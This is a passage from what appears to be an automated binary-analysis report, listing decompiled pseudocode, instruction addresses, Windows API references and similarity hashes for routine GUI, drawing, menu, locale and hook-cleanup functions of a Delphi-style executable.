						__eflags =  *((char*)(_t139 + 0x3a));
						if( *((char*)(_t139 + 0x3a)) != 0) {
							_t136 =  *((intOrPtr*)(_v8 + 0xc));
							__eflags = E0041CB28( *((intOrPtr*)(_v8 + 0xc))) |  *0x43be98;
							E0041CB34( *((intOrPtr*)(_v8 + 0xc)), E0041CB28( *((intOrPtr*)(_v8 + 0xc))) |  *0x43be98, _t136, _t139, _t143);
						}
						__eflags =  *((char*)(_t139 + 0x39));
						if( *((char*)(_t139 + 0x39)) != 0) {
							L24:
							_t63 = E004044A0(_v16);
							_t65 = E004046A0(_v16);
							DrawTextA(E0041D6C0(_v8), _t65, _t63, _a12, _t117);
							L25:
							_pop(_t127);
							 *[fs:eax] = _t127;
							_push(0x43be77);
							return E004041E0( &_v16);
						} else {
							__eflags = _a8;
							if(_a8 == 0) {
								OffsetRect(_a12, 1, 1);
								E0041C868( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
								_t89 = E004044A0(_v16);
								_t91 = E004046A0(_v16);
								DrawTextA(E0041D6C0(_v8), _t91, _t89, _a12, _t117);
								OffsetRect(_a12, 0xffffffff, 0xffffffff);
							}
							__eflags = _a8;
							if(_a8 == 0) {
								L23:
								E0041C868( *((intOrPtr*)(_v8 + 0xc)), 0xff000010);
							} else {
								_t76 = E0041C3A8(0xff00000d);
								_t78 = E0041C3A8(0xff000010);
								__eflags = _t76 - _t78;
								if(_t76 != _t78) {
									goto L23;
								}
								E0041C868( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
							}
							goto L24;
						}
					}
					if((_t117 & 0x00000004) == 0) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_v32.top = _v32.top + 4;
						DrawEdge(E0041D6C0(_v8),  &_v32, 6, 2);
					}
					goto L25;
				} else {
					if(_v16 == 0) {
						L11:
						E004044A8( &_v16, 0x43be88);
						goto L12;
					}
					if( *_v16 != 0x26) {
						goto L12;
					}
					_t153 =  *((char*)(_v16 + 1));
					if(_t153 != 0) {
						goto L12;
					}
					goto L11;
				}
			}

0x0043bc8c
0x0043bc8d
0x0043bc97
0x0043bc9a
0x0043bc9d
0x0043bca0
0x0043bca2
0x0043bca7
0x0043bca8
0x0043bcad
0x0043bcb0
0x0043bcb5
0x0043bcba
0x0043bcbe
0x0043bcce
0x0043bcdd
0x0043bce0
0x0043bce5
0x0043bce5
0x0043bce5
0x0043bcd0
0x0043bcd3
0x0043bcd3
0x0043bce8
0x0043bce8
0x0043bcf4
0x0043bcfc
0x0043bd22
0x0043bd2a
0x0043bd2f
0x0043bd6d
0x0043bd72
0x0043bd76
0x0043bd7b
0x0043bd87
0x0043bd8f
0x0043bd8f
0x0043bd94
0x0043bd98
0x0043be35
0x0043be3d
0x0043be46
0x0043be55
0x0043be5a
0x0043be5c
0x0043be5f
0x0043be62
0x0043be6f
0x0043bd9e
0x0043bd9e
0x0043bda2
0x0043bdac
0x0043bdbc
0x0043bdc9
0x0043bdd2
0x0043bde1
0x0043bdee
0x0043bdee
0x0043bdf3
0x0043bdf7
0x0043be25
0x0043be30
0x0043bdf9
0x0043bdfe
0x0043be0a
0x0043be0f
0x0043be11
0x00000000
0x00000000
0x0043be1e
0x0043be1e
0x00000000
0x0043bdf7
0x0043bd98
0x0043bd34
0x0043bd42
0x0043bd43
0x0043bd44
0x0043bd45
0x0043bd46
0x0043bd5b
0x0043bd5b
0x00000000
0x0043bcfe
0x0043bd02
0x0043bd15
0x0043bd1d
0x00000000
0x0043bd1d
0x0043bd0a
0x00000000
0x00000000
0x0043bd0f
0x0043bd13
0x00000000
0x00000000
0x00000000
0x0043bd13

APIs

DrawEdge.USER32(00000000,?,00000006,00000002), ref: 0043BD5B
OffsetRect.USER32(?,00000001,00000001), ref: 0043BDAC
DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0043BDE1
OffsetRect.USER32(?,000000FF,000000FF), ref: 0043BDEE
DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0043BE55

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Draw$OffsetRectText$Edge
String ID:
API String ID: 3610532707-0
Opcode ID: dc624f298eb8b9222ed68f25da1ce54a54011090f051fe7b4520495c77b33999
Instruction ID: bf503c7933756eef2c6ba3c77e40b18067cc4d6b2622ffbda7aec3605c63bc03
Opcode Fuzzy Hash: dc624f298eb8b9222ed68f25da1ce54a54011090f051fe7b4520495c77b33999
Instruction Fuzzy Hash: 24515270A00208AFDB20EBA9C882BDE77E5EF49314F54956AFA14E7391C73DDD408759

Uniqueness

Uniqueness Score: -1.00%

Function 004302C0, Relevance: 7.6, APIs: 5, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E004302C0(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagPAINTSTRUCT _v84;
				intOrPtr _t55;
				void* _t64;
				struct HDC__* _t75;
				intOrPtr _t84;
				void* _t95;
				void* _t96;
				void* _t98;
				void* _t100;
				void* _t101;
				intOrPtr _t102;

				_t100 = _t101;
				_t102 = _t101 + 0xffffffb0;
				_v12 = __edx;
				_v8 = __eax;
				_t75 =  *(_v12 + 4);
				if(_t75 == 0) {
					_t75 = BeginPaint(E0043260C(_v8),  &_v84);
				}
				_push(_t100);
				_push(0x4303e0);
				_push( *[fs:edx]);
				 *[fs:edx] = _t102;
				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
					_v20 = SaveDC(_t75);
					_v16 = 2;
					_t95 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
					if(_t95 >= 0) {
						_t96 = _t95 + 1;
						_t98 = 0;
						do {
							_t64 = E00413E68( *((intOrPtr*)(_v8 + 0x198)), _t98);
							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
									goto L11;
								} else {
									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
									if(_v16 != 1) {
										goto L11;
									}
								}
							} else {
								goto L11;
							}
							goto L12;
							L11:
							_t98 = _t98 + 1;
							_t96 = _t96 - 1;
						} while (_t96 != 0);
					}
					L12:
					if(_v16 != 1) {
						 *((intOrPtr*)( *_v8 + 0xb8))();
					}
					RestoreDC(_t75, _v20);
				} else {
					 *((intOrPtr*)( *_v8 + 0xb8))();
				}
				E00430418(_v8, 0, _t75);
				_pop(_t84);
				 *[fs:eax] = _t84;
				_push(0x4303e7);
				_t55 = _v12;
				if( *((intOrPtr*)(_t55 + 4)) == 0) {
					return EndPaint(E0043260C(_v8),  &_v84);
				}
				return _t55;
			}

0x004302c1
0x004302c3
0x004302c9
0x004302cc
0x004302d2
0x004302d7
0x004302eb
0x004302eb
0x004302ef
0x004302f0
0x004302f5
0x004302f8
0x00430305
0x0043031f
0x00430322
0x00430335
0x00430338
0x0043033a
0x0043033b
0x0043033d
0x00430348
0x00430351
0x00430363
0x00000000
0x00430365
0x00430381
0x00430388
0x00000000
0x00000000
0x00430388
0x00000000
0x00000000
0x00000000
0x00000000
0x0043038a
0x0043038a
0x0043038b
0x0043038b
0x0043033d
0x0043038e
0x00430392
0x0043039b
0x0043039b
0x004303a6
0x00430307
0x0043030e
0x0043030e
0x004303b2
0x004303b9
0x004303bc
0x004303bf
0x004303c4
0x004303cb
0x00000000
0x004303da
0x004303df

APIs

BeginPaint.USER32(00000000,?), ref: 004302E6
SaveDC.GDI32(?), ref: 0043031A
ExcludeClipRect.GDI32(?,?,?,?,?,?), ref: 0043037C
RestoreDC.GDI32(?,?), ref: 004303A6
EndPaint.USER32(00000000,?,004303E7), ref: 004303DA

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Paint$BeginClipExcludeRectRestoreSave
String ID:
API String ID: 3808407030-0
Opcode ID: 1b4e823e658fec81593b4ed5328e34a95f368c9df9a536e2acdbfa43cd59a409
Instruction ID: 92525e9a76e932aa0f2fb9871a67fd2cb257035e12fd4955e1c6b845fdebbd08
Opcode Fuzzy Hash: 1b4e823e658fec81593b4ed5328e34a95f368c9df9a536e2acdbfa43cd59a409
Instruction Fuzzy Hash: 0B415E70A04204EFCB10DF99C895FAEB7F9AF48304F1591EAE9049B362D7799D45CB18

Uniqueness

Uniqueness Score: -1.00%

Function 0043BACC, Relevance: 7.6, APIs: 5, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043BACC(int __eax, void* __edx) {
				signed int _t39;
				signed int _t40;
				intOrPtr _t44;
				int _t46;
				int _t47;
				intOrPtr* _t48;

				_t18 = __eax;
				_t48 = __eax;
				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
						 *((char*)(__eax + 0x74)) = 1;
						return __eax;
					}
					_t19 =  *((intOrPtr*)(__eax + 0x6c));
					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
						return E0043BACC(_t19, __edx);
					}
					_t18 = GetMenuItemCount(E0043BBFC(__eax));
					_t47 = _t18;
					_t40 = _t39 & 0xffffff00 | _t47 == 0x00000000;
					while(_t47 > 0) {
						_t46 = _t47 - 1;
						_t18 = GetMenuState(E0043BBFC(_t48), _t46, 0x400);
						if((_t18 & 0x00000004) == 0) {
							_t18 = RemoveMenu(E0043BBFC(_t48), _t46, 0x400);
							_t40 = 1;
						}
						_t47 = _t47 - 1;
					}
					if(_t40 != 0) {
						if( *((intOrPtr*)(_t48 + 0x64)) != 0) {
							L14:
							E0043B98C(_t48);
							L15:
							return  *((intOrPtr*)( *_t48 + 0x3c))();
						}
						_t44 =  *0x43a5e0; // 0x43a62c
						if(E00403604( *((intOrPtr*)(_t48 + 0x70)), _t44) == 0 || GetMenuItemCount(E0043BBFC(_t48)) != 0) {
							goto L14;
						} else {
							DestroyMenu( *(_t48 + 0x34));
							 *(_t48 + 0x34) = 0;
							goto L15;
						}
					}
				}
				return _t18;
			}

0x0043bacc
0x0043bad0
0x0043bad6
0x0043bae0
0x0043bae2
0x00000000
0x0043bae2
0x0043baeb
0x0043baf0
0x00000000
0x0043baf2
0x0043bb04
0x0043bb09
0x0043bb0d
0x0043bb12
0x0043bb1b
0x0043bb25
0x0043bb2c
0x0043bb3c
0x0043bb41
0x0043bb41
0x0043bb43
0x0043bb44
0x0043bb4a
0x0043bb50
0x0043bb85
0x0043bb87
0x0043bb8c
0x00000000
0x0043bb92
0x0043bb55
0x0043bb62
0x00000000
0x0043bb75
0x0043bb79
0x0043bb80
0x00000000
0x0043bb80
0x0043bb62
0x0043bb4a
0x0043bb99

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 345d683e530d82ef900e8a6c12976ded95712800132fcc7e62802ecc1939fe08
Instruction ID: e675c4ec0419a1bfc29a1ff7c5c5bc2ec16fc4e3f05f7452554d88f8db3284e7
Opcode Fuzzy Hash: 345d683e530d82ef900e8a6c12976ded95712800132fcc7e62802ecc1939fe08
Instruction Fuzzy Hash: 4C119D217413495ACA20BA3B8845B5BB688DF48708F04242BBE41EB78BCF3CEC4586D8

Uniqueness

Uniqueness Score: -1.00%

Function 0044AFBC, Relevance: 7.6, APIs: 5, Instructions: 73
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044AFBC(void* __eax, void* __ecx, struct HWND__** __edx) {
				intOrPtr _t11;
				intOrPtr _t20;
				void* _t30;
				void* _t31;
				void* _t33;
				struct HWND__** _t34;
				struct HWND__* _t35;
				struct HWND__* _t36;

				_t31 = __ecx;
				_t34 = __edx;
				_t33 = __eax;
				_t30 = 0;
				_t11 =  *((intOrPtr*)(__edx + 4));
				if(_t11 < 0x100 || _t11 > 0x108) {
					L16:
					return _t30;
				} else {
					_t35 = GetCapture();
					if(_t35 != 0) {
						if(GetWindowLongA(_t35, 0xfffffffa) ==  *0x47b660 && SendMessageA(_t35, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
					_t36 =  *_t34;
					_t2 = _t33 + 0x44; // 0x0
					_t20 =  *_t2;
					if(_t20 == 0 || _t36 !=  *((intOrPtr*)(_t20 + 0x254))) {
						L7:
						if(E00428E38(_t36, _t31) == 0 && _t36 != 0) {
							_t36 = GetParent(_t36);
							goto L7;
						}
						if(_t36 == 0) {
							_t36 =  *_t34;
						}
						goto L11;
					} else {
						_t36 = E0043260C(_t20);
						L11:
						if(SendMessageA(_t36, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
				}
			}

0x0044afbc
0x0044afc0
0x0044afc2
0x0044afc4
0x0044afc6
0x0044afce
0x0044b06d
0x0044b073
0x0044afdf
0x0044afe4
0x0044afe8
0x0044b04e
0x0044b06b
0x0044b06b
0x00000000
0x0044b04e
0x0044afea
0x0044afec
0x0044afec
0x0044aff1
0x0044b00c
0x0044b015
0x0044b00a
0x00000000
0x0044b00a
0x0044b01d
0x0044b01f
0x0044b01f
0x00000000
0x0044affb
0x0044b000
0x0044b021
0x0044b03a
0x0044b03c
0x0044b03c
0x00000000
0x0044b03a
0x0044aff1

APIs

GetCapture.USER32 ref: 0044AFDF
SendMessageA.USER32(00000000,-0000BBEE,02321704,?), ref: 0044B033
GetWindowLongA.USER32(00000000,000000FA), ref: 0044B043
SendMessageA.USER32(00000000,-0000BBEE,02321704,?), ref: 0044B062

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: MessageSend$CaptureLongWindow
String ID:
API String ID: 1158686931-0
Opcode ID: 8ff585689c1292dc53cb565c5658c17b8c81167e6c6a91dc2ca0f314fbb66222
Instruction ID: ce9d20ffbc85f04639abf66609b3bcef8b162e8f3b4ccc9a087dab5e2302bab9
Opcode Fuzzy Hash: 8ff585689c1292dc53cb565c5658c17b8c81167e6c6a91dc2ca0f314fbb66222
Instruction Fuzzy Hash: C61190712046089FE670FA59C980F27B3DCDB18316F10453AF97AD3352DB29EC1086AC

Uniqueness

Uniqueness Score: -1.00%

Function 0041F3FC, Relevance: 7.6, APIs: 5, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0041F3FC(int __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				int _v12;
				struct HDC__* _v16;
				void* _v20;
				struct tagRGBQUAD _v1044;
				int _t16;
				struct HDC__* _t18;
				int _t31;
				int _t34;
				intOrPtr _t41;
				void* _t43;
				void* _t46;
				void* _t48;
				intOrPtr _t49;

				_t16 = __eax;
				_t46 = _t48;
				_t49 = _t48 + 0xfffffbf0;
				_v8 = __edx;
				_t43 = __eax;
				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
					L4:
					return _t16;
				} else {
					_t16 = E0041E24C(_v8, 0xff,  &_v1044);
					_t34 = _t16;
					if(_t34 == 0) {
						goto L4;
					} else {
						_push(0);
						L0040677C();
						_v12 = _t16;
						_t18 = _v12;
						_push(_t18);
						L00406484();
						_v16 = _t18;
						_v20 = SelectObject(_v16, _t43);
						_push(_t46);
						_push(0x41f4ab);
						_push( *[fs:eax]);
						 *[fs:eax] = _t49;
						SetDIBColorTable(_v16, 0, _t34,  &_v1044);
						_pop(_t41);
						 *[fs:eax] = _t41;
						_push(0x41f4b2);
						SelectObject(_v16, _v20);
						DeleteDC(_v16);
						_t31 = _v12;
						_push(_t31);
						_push(0);
						L004069B4();
						return _t31;
					}
				}
			}

0x0041f3fc
0x0041f3fd
0x0041f3ff
0x0041f407
0x0041f40a
0x0041f40e
0x0041f4b2
0x0041f4b7
0x0041f41f
0x0041f42d
0x0041f432
0x0041f436
0x00000000
0x0041f438
0x0041f438
0x0041f43a
0x0041f43f
0x0041f442
0x0041f445
0x0041f446
0x0041f44b
0x0041f458
0x0041f45d
0x0041f45e
0x0041f463
0x0041f466
0x0041f477
0x0041f47e
0x0041f481
0x0041f484
0x0041f491
0x0041f49a
0x0041f49f
0x0041f4a2
0x0041f4a3
0x0041f4a5
0x0041f4aa
0x0041f4aa
0x0041f436

APIs

Part of subcall function 0041E24C: GetObjectA.GDI32(?,00000004), ref: 0041E263

72E7AC50.USER32(00000000), ref: 0041F43A
SelectObject.GDI32(?), ref: 0041F453
SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,0041F4AB,?,?,?,?,00000000), ref: 0041F477
SelectObject.GDI32(?,?), ref: 0041F491
DeleteDC.GDI32(?), ref: 0041F49A

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Object$Select$ColorDeleteTable
String ID:
API String ID: 3648526112-0
Opcode ID: 10c1d51566b293bbbafad24e6ac4afff0f1c063a64f53df5720c4e02d758f858
Instruction ID: f2b03904cd55be4bff268b22f999539e693adff57f6e84c6c544d3dcf3cce47d
Opcode Fuzzy Hash: 10c1d51566b293bbbafad24e6ac4afff0f1c063a64f53df5720c4e02d758f858
Instruction Fuzzy Hash: 19115172E102096FDB11EBE9DC51AAEB3FCEB08704F0144BAB504E7281D67C9E948B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040B0D8, Relevance: 7.6, APIs: 5, Instructions: 50
threadCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040B0D8(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x40b16f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E0040AE50(GetThreadLocale(), 0x40b184, 0x100b,  &_v8);
				_t29 = E00408140(0x40b184, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E0040B024, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x47b764;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E0040B060, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E0040B176);
				return E004041E0( &_v8);
			}

0x0040b0d8
0x0040b0db
0x0040b0e0
0x0040b0e1
0x0040b0e6
0x0040b0e9
0x0040b0ff
0x0040b111
0x0040b11b
0x0040b12b
0x0040b130
0x0040b135
0x0040b13a
0x0040b13a
0x0040b140
0x0040b143
0x0040b143
0x0040b154
0x0040b154
0x0040b15b
0x0040b15e
0x0040b161
0x0040b16e

APIs

GetThreadLocale.KERNEL32(?,00000000,0040B16F,?,?,00000000), ref: 0040B0F0

Part of subcall function 0040AE50: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040AE6E

GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040B16F,?,?,00000000), ref: 0040B120
EnumCalendarInfoA.KERNEL32(Function_0000B024,00000000,00000000,00000004), ref: 0040B12B
GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040B16F,?,?,00000000), ref: 0040B149
EnumCalendarInfoA.KERNEL32(Function_0000B060,00000000,00000000,00000003), ref: 0040B154

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: 853ab895cef462e9062c5496d70793c90be0b7f06dede836451bab69c2243650
Instruction ID: 7c7f9a31c1e27f3a09b9a434cb1c46137029dafd8fae79e3c1dbb4509c71d34d
Opcode Fuzzy Hash: 853ab895cef462e9062c5496d70793c90be0b7f06dede836451bab69c2243650
Instruction Fuzzy Hash: 1301F7346006046BE701BBB1DC13B5A7298DB45B18F214176F901BA6C1E77CAE1181EC

Uniqueness

Uniqueness Score: -1.00%

Function 00449C64, Relevance: 7.5, APIs: 5, Instructions: 25
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00449C64() {
				void* _t2;
				void* _t5;
				void* _t8;
				struct HHOOK__* _t10;

				if( *0x47bbb4 != 0) {
					_t10 =  *0x47bbb4; // 0x0
					UnhookWindowsHookEx(_t10);
				}
				 *0x47bbb4 = 0;
				if( *0x47bbb8 != 0) {
					_t2 =  *0x47bbb0; // 0x0
					SetEvent(_t2);
					if(GetCurrentThreadId() !=  *0x47bbac) {
						_t8 =  *0x47bbb8; // 0x0
						WaitForSingleObject(_t8, 0xffffffff);
					}
					_t5 =  *0x47bbb8; // 0x0
					CloseHandle(_t5);
					 *0x47bbb8 = 0;
					return 0;
				}
				return 0;
			}

0x00449c6b
0x00449c6d
0x00449c73
0x00449c73
0x00449c7a
0x00449c86
0x00449c88
0x00449c8e
0x00449c9e
0x00449ca2
0x00449ca8
0x00449ca8
0x00449cad
0x00449cb3
0x00449cba
0x00000000
0x00449cba
0x00449cbf

APIs

UnhookWindowsHookEx.USER32(00000000), ref: 00449C73
SetEvent.KERNEL32(00000000,0044BF2E), ref: 00449C8E
GetCurrentThreadId.KERNEL32 ref: 00449C93
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0044BF2E), ref: 00449CA8
CloseHandle.KERNEL32(00000000,00000000,0044BF2E), ref: 00449CB3

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
String ID:
API String ID: 2429646606-0
Opcode ID: 1ff296c76c76e5b92da3987f82d4b2c8a8414b2519e715427bbf5e9f972daaf7
Instruction ID: 8d672b428758f3400e63ca0f1089301c0078be3073cd5674fa8fc712f27adef0
Opcode Fuzzy Hash: 1ff296c76c76e5b92da3987f82d4b2c8a8414b2519e715427bbf5e9f972daaf7
Instruction Fuzzy Hash: 89F0A5716042009AD760FBB9EC89B5732E8E705314B1109BEB909D3AE9D739B9D0DB9C

Uniqueness

Uniqueness Score: -1.00%

Function 00436744, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 287
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00436744(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr* _v8;
				struct tagPOINT _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				struct tagMSG _v64;
				intOrPtr _v68;
				long _v72;
				char _v76;
				intOrPtr _t125;
				int _t126;
				int _t140;
				int _t147;
				intOrPtr* _t175;
				int _t186;
				void* _t191;
				intOrPtr* _t209;
				void* _t213;
				intOrPtr _t214;
				intOrPtr _t219;
				int _t232;
				intOrPtr _t233;
				int _t236;
				intOrPtr* _t242;
				intOrPtr _t262;
				intOrPtr _t278;
				intOrPtr _t289;
				int _t297;
				int _t300;
				int _t302;
				int _t303;
				int _t304;
				void* _t307;
				void* _t309;
				void* _t315;

				_t315 = __fp0;
				_t306 = _t307;
				_v76 = 0;
				_t242 = __edx;
				_v8 = __eax;
				_push(_t307);
				_push(0x436b1c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t307 + 0xffffffb8;
				_t125 =  *__edx;
				_t309 = _t125 - 0x202;
				if(_t309 > 0) {
					_t126 = _t125 - 0x203;
					__eflags = _t126;
					if(__eflags == 0) {
						E00406B50( *((intOrPtr*)(__edx + 8)), 0,  &_v72);
						_t297 = E004351D4(_v8,  &_v20,  &_v72, __eflags);
						__eflags = _t297;
						if(_t297 != 0) {
							__eflags =  *(_t297 + 4);
							if( *(_t297 + 4) != 0) {
								__eflags = _v20 - 2;
								if(_v20 == 2) {
									E0042A7B8();
									E0042CC10( *(_t297 + 4), 0, 0, 1);
								}
							}
						}
						L47:
						if( *((short*)(_v8 + 0x32)) != 0) {
							 *((intOrPtr*)(_v8 + 0x30))();
						}
						L49:
						_pop(_t262);
						 *[fs:eax] = _t262;
						_push(0x436b23);
						return E004041E0( &_v76);
					}
					_t140 = _t126 - 0xae2d;
					__eflags = _t140;
					if(_t140 == 0) {
						 *((intOrPtr*)(_v8 + 0x30))();
						__eflags =  *(__edx + 0xc);
						if( *(__edx + 0xc) != 0) {
							goto L49;
						}
						_t300 =  *((intOrPtr*)( *_v8 + 4))();
						__eflags = _v20 - 0x12;
						if(_v20 != 0x12) {
							__eflags = _t300;
							if(_t300 == 0) {
								goto L49;
							}
							_t147 = _v20 - 2;
							__eflags = _t147;
							if(_t147 == 0) {
								L46:
								E0042B8F8(_t300,  &_v36);
								 *((intOrPtr*)( *_v8))();
								_v36 = _v36 - _v36 -  *((intOrPtr*)(_t300 + 0x40)) + _v36 -  *((intOrPtr*)(_t300 + 0x40));
								_v32 = _v32 - _v32 -  *((intOrPtr*)(_t300 + 0x44)) + _v32 -  *((intOrPtr*)(_t300 + 0x44));
								_v28 = _v28 -  *((intOrPtr*)(_t300 + 0x48)) - _v28 - _v36 +  *((intOrPtr*)(_t300 + 0x48)) - _v28 - _v36;
								_v24 = _v24 -  *((intOrPtr*)(_t300 + 0x4c)) - _v24 - _v32 +  *((intOrPtr*)(_t300 + 0x4c)) - _v24 - _v32;
								E0042BF48(_t300,  &_v76);
								E00404234( *((intOrPtr*)(_t242 + 8)) + 0x38, _v76);
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								goto L49;
							}
							__eflags = _t147 != 0x12;
							if(_t147 != 0x12) {
								goto L49;
							}
							goto L46;
						}
						E004041E0( *((intOrPtr*)(__edx + 8)) + 0x38);
						goto L49;
					} else {
						__eflags = _t140 == 0x12;
						if(_t140 == 0x12) {
							_t175 =  *((intOrPtr*)(__edx + 8));
							__eflags =  *_t175 - 0xb00b;
							if( *_t175 == 0xb00b) {
								E0043662C(_v8,  *((intOrPtr*)(_t175 + 4)),  *((intOrPtr*)(__edx + 4)));
							}
						}
						goto L47;
					}
				}
				if(_t309 == 0) {
					__eflags =  *(_v8 + 0x60);
					if(__eflags != 0) {
						E00436178(_v8, __eflags);
					} else {
						E00406B50( *((intOrPtr*)(__edx + 8)), 0,  &_v16);
						_t302 = E004351D4(_v8,  &_v20,  &_v16, __eflags);
						__eflags = _t302;
						if(_t302 != 0) {
							__eflags = _v20 - 0x14;
							if(_v20 == 0x14) {
								_t295 =  *((intOrPtr*)(_t302 + 4));
								_t278 =  *0x440ce4; // 0x440d30
